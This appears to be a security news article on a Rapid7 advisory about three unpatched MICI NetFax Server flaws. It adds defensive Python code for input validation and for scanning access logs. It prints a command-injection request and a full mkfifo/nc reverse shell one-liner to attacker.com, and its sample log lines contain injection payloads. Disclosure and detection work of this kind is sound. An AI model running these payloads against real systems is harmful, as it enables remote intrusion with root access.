MICI NetFax Server Flaws Allow Attackers to Execute Remote Code

In a recent security advisory, Rapid7 has disclosed three severe vulnerabilities in MICI Network Co., Ltd’s NetFax Server, affecting all versions before 3.0.1.0.

These flaws—CVE-2025-48045, CVE-2025-48046, and CVE-2025-48047—allow attackers to gain root-level access through a chain of authenticated attacks, with default credentials and sensitive information exposed in cleartext.

Despite the risks, the vendor has stated it will not address these vulnerabilities, leaving organizations reliant on this product exposed to significant threats.

The first vulnerability, CVE-2025-48045, involves the disclosure of default administrative credentials via HTTP GET requests to the /client.php endpoint.

When users connect to the web application, the server responds with default System Administrator credentials in cleartext, a result of legacy support for the ‘OneIn’ client.

This issue is classified as CWE-201: Insertion of Sensitive Information Into Sent Data and carries a CVSS 4.0 score of 6.6 (Moderate).

The second flaw, CVE-2025-48046, pertains to the exposure of stored SMTP passwords.

While the web interface redacts passwords, the underlying configuration file, accessible via a GET request to /config.php, returns the SMTP password in cleartext.

This is a classic CWE-260: Password in Configuration File scenario, rated at 5.3 (Moderate) on the CVSS scale.

Command Injection Enables Remote Code Execution

The most critical vulnerability, CVE-2025-48047, allows authenticated users to exploit improper input sanitization in the server’s testing functions, particularly those accessible via /test.php.

Parameters such as ETHNAMESERVER can be manipulated to inject system commands, including reverse shell payloads, using the mkfifo and nc binaries.

This vulnerability is categorized under CWE-78: Improper Neutralization of Special Elements used in an OS Command (“OS Command Injection”) and is rated as Critical (CVSS 9.4).

A simplified example of the attack chain is as follows:

```text
GET /test.php?ETHNAMESERVER=`whoami` HTTP/1.1
Host: vulnerable-server
```

This unsanitized input is executed by the server, leading to remote code execution (RCE) as the root user.

Attackers can escalate this with a reverse shell payload:

```bash
mkfifo /tmp/s; nc attacker.com 4444 0</tmp/s | /bin/sh >/tmp/s 2>&1; rm /tmp/s
```
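To make the CWE-78 point concrete from the defender's side, here is an added example in Python (not the NetFax Server's own PHP code, which is not shown in the advisory): the string-concatenation pattern the vulnerability class describes sits beside a hardened version that validates ETHNAMESERVER as an IP address or hostname and invokes ping through an argument list with no shell in between. The function names and the ping invocation are assumptions for illustration.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# One DNS label per RFC 1123: letters, digits, hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def unsafe_ping_command(nameserver: str) -> str:
    """The CWE-78 pattern, for contrast only (hypothetical, not the vendor's code):
    the raw parameter is concatenated into a shell command line. This function
    returns the string and never executes it, so the injection stays visible
    but inert."""
    return "ping -c 1 " + nameserver


def validate_nameserver(value: str) -> Optional[str]:
    """Allow-list validation: return the value if it is a syntactically valid
    IP address or hostname, otherwise None. Shell metacharacters, whitespace,
    backticks and '$(' can never pass because no label rule admits them."""
    if not value or len(value) > 253:
        return None
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if labels and all(_LABEL.match(label) for label in labels):
        return value
    return None


def build_ping_argv(nameserver: str) -> List[str]:
    """Build the argv for ping. The validated value is passed as one argument
    and no shell is involved, so there is nothing to inject into."""
    checked = validate_nameserver(nameserver)
    if checked is None:
        raise ValueError("rejected ETHNAMESERVER value")
    return ["ping", "-c", "1", checked]


def run_ping(nameserver: str) -> int:
    """Run the connectivity test the safe way and return ping's exit status."""
    result = subprocess.run(build_ping_argv(nameserver), capture_output=True, timeout=10)
    return result.returncode
```

The two defences are independent and both matter: the allow-list rejects anything that is not an address or hostname before it reaches a command, and the argv form means that even a value which slipped through validation would arrive at ping as a single literal argument rather than being parsed by /bin/sh.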

Vendor Response and Risk Mitigation

Despite repeated attempts by Rapid7 and TWCERT to engage MICI, the vendor has refused to address these vulnerabilities, advising only that users should not expose the NetFax Server to external networks.

However, the risk of internal exploitation remains, especially since users are not required to change the default credentials at first login and sensitive data is insufficiently protected.
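Because the vendor offers no fix, monitoring the three endpoints named in the advisory is one of the few controls available. The following is an added example, not from Rapid7 or MICI, that scans web-server access log lines in the common "combined" format for GET requests to /config.php and /client.php and for /test.php query parameters containing shell metacharacters. The log lines are constructed for the example; the log format and source addresses are assumptions.

```python
import re
from typing import Iterator, List, Tuple
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access log format; only the fields we need are captured.
_LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that have no place in a nameserver/IP parameter but drive a shell.
_SHELL_META = re.compile(r"[;|&`$<>\n\r]|\$\(")

# Endpoints from the advisory and why a request to them is worth a look.
_SENSITIVE = {
    "/config.php": "config file fetched: SMTP password returned in cleartext (CVE-2025-48046)",
    "/client.php": "client endpoint fetched: default admin credentials returned (CVE-2025-48045)",
}

# Constructed sample lines; addresses and timestamps are invented for the example.
SAMPLE_LOG = """\
10.0.5.23 - - [10/Jun/2025:09:12:01 +0000] "GET /test.php?ETHNAMESERVER=8.8.8.8 HTTP/1.1" 200 512
10.0.5.23 - - [10/Jun/2025:09:12:07 +0000] "GET /test.php?ETHNAMESERVER=%60whoami%60 HTTP/1.1" 200 544
10.0.5.23 - - [10/Jun/2025:09:12:19 +0000] "GET /test.php?ETHNAMESERVER=8.8.8.8;mkfifo%20/tmp/s HTTP/1.1" 200 544
10.0.7.8 - - [10/Jun/2025:09:13:02 +0000] "GET /config.php HTTP/1.1" 200 2048
10.0.7.8 - - [10/Jun/2025:09:13:05 +0000] "GET /client.php HTTP/1.1" 200 1200
10.0.7.9 - - [10/Jun/2025:09:14:00 +0000] "GET /index.php HTTP/1.1" 200 3000
"""


def _query_params(query: str) -> Iterator[Tuple[str, str]]:
    """Split on '&' only and percent-decode each side. Deliberately not parse_qsl,
    whose older versions also split on ';', which would hide the very character
    an injection attempt relies on."""
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        yield unquote_plus(key), unquote_plus(raw)


def analyse_line(line: str) -> List[str]:
    """Return a list of human-readable findings for one access log line."""
    m = _LOG.match(line)
    if not m:
        return []
    findings = []
    src = m.group("src")
    parts = urlsplit(m.group("target"))
    path = parts.path
    if path in _SENSITIVE:
        findings.append(f"{src} -> {path}: {_SENSITIVE[path]}")
    if path == "/test.php":
        for key, value in _query_params(parts.query):
            if _SHELL_META.search(value):
                findings.append(
                    f"{src} -> /test.php param {key}={value!r}: shell metacharacter, "
                    f"possible OS command injection (CVE-2025-48047)"
                )
    return findings


def scan_log(text: str) -> List[str]:
    """Scan a whole log body and collect every finding in order."""
    findings: List[str] = []
    for line in text.splitlines():
        findings.extend(analyse_line(line))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against real logs, the /config.php and /client.php hits will include the product's own web UI fetching them on behalf of legitimate users, so those findings are best correlated by source address and time of day rather than alerted on individually; the /test.php metacharacter findings are rarely benign, since a nameserver or address field never legitimately contains a backtick or semicolon.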

MICI NetFax Server Vulnerabilities

| CVE ID | Vulnerability Description | CWE | CVSS 4.0 | Attack Vector | Severity |
| --- | --- | --- | --- | --- | --- |
| CVE-2025-48045 | Default Credentials Disclosure | CWE-201 | 6.6 | GET /client.php | Moderate |
| CVE-2025-48046 | Stored Passwords in Cleartext | CWE-260 | 5.3 | GET /config.php | Moderate |
| CVE-2025-48047 | Command Injection (RCE) | CWE-78 | 9.4 | GET /test.php (ping functionality) | Critical |

Remediation steps recommended by Rapid7 include:

  • Do not expose the server to the internet or unnecessary internal networks.
  • Change the default credentials immediately after installation.
  • Redact sensitive information from configuration files before sending them to clients.
  • Implement strict input sanitization and server-side validation for all configuration parameters.

With no vendor patch forthcoming, organizations are urged to review their exposure and consider decommissioning affected devices, as some customers have already done.

Security teams using Rapid7’s InsightVM and Nexpose can assess their exposure with unauthenticated checks provided in the latest content release.
